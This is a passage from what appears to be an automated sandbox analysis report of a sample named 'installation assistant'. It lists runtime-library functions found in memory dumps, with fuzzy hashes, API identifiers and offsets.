                                         • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmp
                                         • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmp
                                         • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp
                                         • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                         • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                         • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                        • String ID:
                                        • API String ID: 1088826258-0
                                        • Opcode ID: 7225e9970d0134b0ba84f916f4522c618d022d3cd9d542f0b079d0a9c37457a0
                                        • Instruction ID: e7d1710b9acd89939fd26c63953ef88483e716a9d69a0a56527b96c08eda5dbc
                                        • Opcode Fuzzy Hash: 7225e9970d0134b0ba84f916f4522c618d022d3cd9d542f0b079d0a9c37457a0
                                        • Instruction Fuzzy Hash: D101D475B006209BDB06DF24C854ABC7BB1FF95314B14000EDC0157790DF35AA56CBE6
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CD36000, based on PE: true
                                         • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                         • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: $!$@
                                        • API String ID: 3519838083-2517134481
                                        • Opcode ID: de11a10d9dafd4c65deb6d7f74020d514e490535ea8bbecf2d37e3263791df61
                                        • Instruction ID: 8d71c76d407ce7fa074510af987ae2d7e69c8a4b44596c2bae5ff0ae7cb0a4bd
                                        • Opcode Fuzzy Hash: de11a10d9dafd4c65deb6d7f74020d514e490535ea8bbecf2d37e3263791df61
                                        • Instruction Fuzzy Hash: FE128074D06249DFDF05CFA4C490ADEBBB5FF09308F14846AE446ABB61DB31A945CB60
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CD36000, based on PE: true
                                         • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                         • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: H_prolog__aulldiv
                                        • String ID: $SJ
                                        • API String ID: 4125985754-3948962906
                                        • Opcode ID: 589161b9174e713d87cd7ea6b7fb48598b4f41844aead815dae59d281551bb28
                                        • Instruction ID: 00f3f981112f8fff64db61447f51235b4d08ae6726121560c831b62ba366c1a9
                                        • Opcode Fuzzy Hash: 589161b9174e713d87cd7ea6b7fb48598b4f41844aead815dae59d281551bb28
                                        • Instruction Fuzzy Hash: D7B14CB1E00249DFCF14CF55C9809AEBBB1FF48358FA0852ED555A7B60D730AA55CB90
                                        APIs
                                          • Part of subcall function 6CD06147: __EH_prolog3.LIBCMT ref: 6CD0614E
                                          • Part of subcall function 6CD06147: std::_Lockit::_Lockit.LIBCPMT ref: 6CD06159
                                          • Part of subcall function 6CD06147: std::locale::_Setgloballocale.LIBCPMT ref: 6CD06174
                                          • Part of subcall function 6CD06147: _Yarn.LIBCPMT ref: 6CD0618A
                                          • Part of subcall function 6CD06147: std::_Lockit::~_Lockit.LIBCPMT ref: 6CD061C7
                                          • Part of subcall function 6CBD2F60: std::_Lockit::_Lockit.LIBCPMT ref: 6CBD2F95
                                          • Part of subcall function 6CBD2F60: std::_Lockit::_Lockit.LIBCPMT ref: 6CBD2FAF
                                          • Part of subcall function 6CBD2F60: std::_Lockit::~_Lockit.LIBCPMT ref: 6CBD2FD0
                                          • Part of subcall function 6CBD2F60: __Getctype.LIBCPMT ref: 6CBD3084
                                          • Part of subcall function 6CBD2F60: std::_Facet_Register.LIBCPMT ref: 6CBD309C
                                          • Part of subcall function 6CBD2F60: std::_Lockit::~_Lockit.LIBCPMT ref: 6CBD30B7
                                        • std::ios_base::_Addstd.LIBCPMT ref: 6CBD211B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                         • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmp
                                         • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmp
                                         • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp
                                         • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                         • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                         • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$AddstdFacet_GetctypeH_prolog3RegisterSetgloballocaleYarnstd::ios_base::_std::locale::_
                                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                        • API String ID: 3332196525-1866435925
                                        • Opcode ID: 64619c379e489257dc3080b166c6f0e9f8bb18f908f761d5eb4b92ae4713aff1
                                        • Instruction ID: cca668e8afd33ae641af728fda7109410e2c10248bf47cd8ac50aacf4b8c34e7
                                        • Opcode Fuzzy Hash: 64619c379e489257dc3080b166c6f0e9f8bb18f908f761d5eb4b92ae4713aff1
                                        • Instruction Fuzzy Hash: 9441D6B0E003498FDB00CF64C8457AEBBB4FF48314F148268E915AB791E775A985CF92
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CD36000, based on PE: true
                                         • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                         • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: $CK$CK
                                        • API String ID: 3519838083-2957773085
                                        • Opcode ID: 2704db3354b84918023bfe159d178872147a663a780c49e5ab543107787eea7d
                                        • Instruction ID: 5daa5863b15bbf2b11c41a9c6b6e8bbae05261ec419b8a7210210e06d7885dab
                                        • Opcode Fuzzy Hash: 2704db3354b84918023bfe159d178872147a663a780c49e5ab543107787eea7d
                                        • Instruction Fuzzy Hash: 6421A470E41215CBCF04DFE9C4801EFF7B6FF94304F94462AC422A7BA1D7749A268A62
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CD36000, based on PE: true
                                         • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                         • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: 0$LrJ$x
                                        • API String ID: 3519838083-658305261
                                        • Opcode ID: 4d1a12b996d8cdd79ba2c3eb3f59f6bf691634cc710ec0f5f651f2212a36eb1c
                                        • Instruction ID: 83f7054a578ba97c579bda875f6fa2958430b7da584ff5703f4dd17a5ca300d6
                                        • Opcode Fuzzy Hash: 4d1a12b996d8cdd79ba2c3eb3f59f6bf691634cc710ec0f5f651f2212a36eb1c
                                        • Instruction Fuzzy Hash: FB21A132D01529EBCF04CBD8CA90AEDB7B5EF99308F21105AE40577AA0DB755E08CBA1
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 6CD62ECC
                                          • Part of subcall function 6CD4D58A: __EH_prolog.LIBCMT ref: 6CD4D58F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CD36000, based on PE: true
                                         • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                         • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: :hJ$dJ$xJ
                                        • API String ID: 3519838083-2437443688
                                        • Opcode ID: e3ee415979c90d2d15618e5f431c2d86ccd996bf58f825059be4d34af7dc85d3
                                        • Instruction ID: b724686fb8db968f341e285c2e8bbca51d557bdde0297eb47cea6697c5253cdb
                                        • Opcode Fuzzy Hash: e3ee415979c90d2d15618e5f431c2d86ccd996bf58f825059be4d34af7dc85d3
                                        • Instruction Fuzzy Hash: 2721C9B0801B50CFC760CF6AC14429ABBF4BF2A708B50C95FC0AA97B11D7B4A608CF59
                                        APIs
                                        • SetFilePointerEx.KERNEL32(00000000,?,00000000,6CD19EF0,6CBD1DEA,00008000,6CD19EF0,?,?,?,6CD19A9F,6CD19EF0,?,00000000,6CBD1DEA), ref: 6CD19BE9
                                        • GetLastError.KERNEL32(?,?,?,6CD19A9F,6CD19EF0,?,00000000,6CBD1DEA,?,6CD234BE,6CD19EF0,000000FF,000000FF,00000002,00008000,6CD19EF0), ref: 6CD19BF3
                                        • __dosmaperr.LIBCMT ref: 6CD19BFA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                         • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmp
                                         • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmp
                                         • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp
                                         • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                         • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                         • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: ErrorFileLastPointer__dosmaperr
                                        • String ID: 8Q
                                        • API String ID: 2336955059-4022487301
                                        • Opcode ID: 8dea3666079ea9a846c55d83d8b927ec9e61047e20607b486018da1a061d3f93
                                        • Instruction ID: b5b17b4760f2332c8d61a8e84434799eb7213f685789e127757b31caaa555392
                                        • Opcode Fuzzy Hash: 8dea3666079ea9a846c55d83d8b927ec9e61047e20607b486018da1a061d3f93
                                        • Instruction Fuzzy Hash: 8501FC32714514AFCB058F6DDC4589E7B7EEBC6338B280208F555D7AA0EB71D90187A0
                                        APIs
                                        • AcquireSRWLockExclusive.KERNEL32(6CE0266C,?,652EF5AA,6CBD230E,6CE0230C), ref: 6CD05927
                                        • ReleaseSRWLockExclusive.KERNEL32(6CE0266C), ref: 6CD0595A
                                        • WakeAllConditionVariable.KERNEL32(6CE02668), ref: 6CD05965
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                         • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmp
                                         • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmp
                                         • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp
                                         • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                         • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                         • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: ExclusiveLock$AcquireConditionReleaseVariableWake
                                        • String ID: l&l
                                        • API String ID: 1466638765-3573850595
                                        • Opcode ID: e4f5269d5f9c790e84cdab67d62e78e144b9a28267d5cdc2b1313a3f313916f1
                                        • Instruction ID: d5a923301cbdb64db077dcbc56fed05ea932f2576649e0d76256289542e85ba3
                                        • Opcode Fuzzy Hash: e4f5269d5f9c790e84cdab67d62e78e144b9a28267d5cdc2b1313a3f313916f1
                                        • Instruction Fuzzy Hash: E1F01CB8B01140DBCB059F58E88CC947BB8EB4B315B00802EE90A87712CB315811CFE4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CD36000, based on PE: true
                                         • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                         • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: <J$DJ$HJ$TJ$]
                                        • API String ID: 0-686860805
                                        • Opcode ID: b82db92acc6f2fd2fd2fd5332bfa7d1e38ecda44958a76cbd211a3f1299ff4ed
                                        • Instruction ID: a271f4157ef53dded5cfb2ac595df20018df211a341477243f019c5e1cf53691
                                        • Opcode Fuzzy Hash: b82db92acc6f2fd2fd2fd5332bfa7d1e38ecda44958a76cbd211a3f1299ff4ed
                                        • Instruction Fuzzy Hash: 4E41D9B0D02259EFCF14CBA1D8908EEB774AF12208B90916AD02567D70DB35EA5ECB61
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CD36000, based on PE: true
                                         • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                         • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: __aulldiv
                                        • String ID:
                                        • API String ID: 3732870572-0
                                        • Opcode ID: 2bdaa92217569021002d8658a142890db49ae38c047720c0e1f220da2750cc6e
                                        • Instruction ID: e8896e4c07c5c7ce0cbeff57636f9e23b941256c8bcd5fdd3d4b3b95c1d4b3d4
                                        • Opcode Fuzzy Hash: 2bdaa92217569021002d8658a142890db49ae38c047720c0e1f220da2750cc6e
                                        • Instruction Fuzzy Hash: 031193B6640244BFEF255BA4CC40EBFBBBDEB85748F50881DB14156670D671BC648770
                                        APIs
                                        • GetLastError.KERNEL32(00000008,?,00000000,6CD17273), ref: 6CD137D7
                                        • _free.LIBCMT ref: 6CD13834
                                        • _free.LIBCMT ref: 6CD1386A
                                        • SetLastError.KERNEL32(00000000,00000008,000000FF), ref: 6CD13875
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                         • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmp
                                         • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmp
                                         • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp
                                         • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                         • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                         • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: ErrorLast_free
                                        • String ID:
                                        • API String ID: 2283115069-0
                                        • Opcode ID: d0fa81296faaeaa377ab16f8135f5cf8d7316c651817656ec7ff65d4bc11a087
                                        • Instruction ID: 84181271f6f889140e863b914a345b2b79460d9d4e9a57c6d9d1d8684529d359
                                        • Opcode Fuzzy Hash: d0fa81296faaeaa377ab16f8135f5cf8d7316c651817656ec7ff65d4bc11a087
                                        • Instruction Fuzzy Hash: 3E11737270D201AAEB015BB97C84D5A6579ABC26BC7290768F12497FB0EF26CC1981B1
                                        APIs
                                        • WriteConsoleW.KERNEL32(00000000,?,6CD2350C,00000000,00000000,?,6CD23971,00000000,00000001,00000000,6CD19EF0,?,6CD1B0A6,?,?,6CD19EF0), ref: 6CD24CF1
                                        • GetLastError.KERNEL32(?,6CD23971,00000000,00000001,00000000,6CD19EF0,?,6CD1B0A6,?,?,6CD19EF0,?,6CD19EF0,?,6CD1AB3C,6CD248D6), ref: 6CD24CFD
                                          • Part of subcall function 6CD24D4E: CloseHandle.KERNEL32(FFFFFFFE,6CD24D0D,?,6CD23971,00000000,00000001,00000000,6CD19EF0,?,6CD1B0A6,?,?,6CD19EF0,?,6CD19EF0), ref: 6CD24D5E
                                        • ___initconout.LIBCMT ref: 6CD24D0D
                                          • Part of subcall function 6CD24D2F: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6CD24CCB,6CD2395E,6CD19EF0,?,6CD1B0A6,?,?,6CD19EF0,?), ref: 6CD24D42
                                        • WriteConsoleW.KERNEL32(00000000,?,6CD2350C,00000000,?,6CD23971,00000000,00000001,00000000,6CD19EF0,?,6CD1B0A6,?,?,6CD19EF0,?), ref: 6CD24D22
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                         • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmp
                                         • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmp
                                         • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp
                                         • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                         • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                         • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                        • String ID:
                                        • API String ID: 2744216297-0
                                        • Opcode ID: fa4b2c82c6903da9efc97bab2683200a965e8d67b543d231abad356d397686c2
                                        • Instruction ID: 022f4b4f9e9e92206fd0184dd135e237fcbd9b290c218ea675c6032aa8606983
                                        • Opcode Fuzzy Hash: fa4b2c82c6903da9efc97bab2683200a965e8d67b543d231abad356d397686c2
                                        • Instruction Fuzzy Hash: 58F0AC36A00118BBDF225FE5DC08A8A3F36FB4A7AAB144514FF1996631D772C8219BD0
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 6CD3C077
                                          • Part of subcall function 6CD3BFF5: __EH_prolog.LIBCMT ref: 6CD3BFFA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CD36000, based on PE: true
                                         • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                         • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: :$\
                                        • API String ID: 3519838083-1166558509
                                        • Opcode ID: 48f4411e2405fcdde49591215dd3ffd545f97566ccde13c94e17e7da02f2e48f
                                        • Instruction ID: f7af41cb4153740d0d32be8e28070c5ca68c7ef72a639e30bbaa9be5894c13e4
                                        • Opcode Fuzzy Hash: 48f4411e2405fcdde49591215dd3ffd545f97566ccde13c94e17e7da02f2e48f
                                        • Instruction Fuzzy Hash: EDE1E531900638DACB10EFA4C890BEEB7B0BF87318F10621AD45D6BAB0DB756549CB65
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CD36000, based on PE: true
                                         • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                         • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: H_prolog__aullrem
                                        • String ID: d%K
                                        • API String ID: 3415659256-3110269457
                                        • Opcode ID: edd8db3a4067630c511c1f9d0118cc4b792e07b2613ebc31a4b030f5161dda76
                                        • Instruction ID: 6c14c1658cd6411e1eeda2545708b3da21baad411c11ea4bf6489267d16f343a
                                        • Opcode Fuzzy Hash: edd8db3a4067630c511c1f9d0118cc4b792e07b2613ebc31a4b030f5161dda76
                                        • Instruction Fuzzy Hash: 6D81A272A02209DFDF00CF58CD90BDEB7F6AF45348F24809AD854AB6A1D771D905CBA1
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                         • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmp
                                         • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmp
                                         • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp
                                         • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                         • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                         • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: H_prolog3_
                                        • String ID: 8Q
                                        • API String ID: 2427045233-4022487301
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CD36000, based on PE: true
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: @$hfJ
                                        • API String ID: 3519838083-1391159562
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 6CD56C5D
                                          • Part of subcall function 6CD5561A: __EH_prolog.LIBCMT ref: 6CD5561F
                                          • Part of subcall function 6CD55A2E: __EH_prolog.LIBCMT ref: 6CD55A33
                                          • Part of subcall function 6CD56EA5: __EH_prolog.LIBCMT ref: 6CD56EAA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CD36000, based on PE: true
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: WZJ
                                        • API String ID: 3519838083-1089469559
                                        APIs
                                        • ___std_exception_destroy.LIBVCRUNTIME ref: 6CBD2A76
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: ___std_exception_destroy
                                        • String ID: Jbx$Jbx
                                        • API String ID: 4194217158-1161259238
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CD36000, based on PE: true
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: <dJ$Q
                                        • API String ID: 3519838083-2252229148
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CD36000, based on PE: true
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: $D^J
                                        • API String ID: 3519838083-3977321784
                                        APIs
                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,00000000,6CD234F6), ref: 6CD1BE3B
                                        • __dosmaperr.LIBCMT ref: 6CD1BE42
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: ErrorLast__dosmaperr
                                        • String ID: 8Q
                                        • API String ID: 1659562826-4022487301
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CD36000, based on PE: true
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
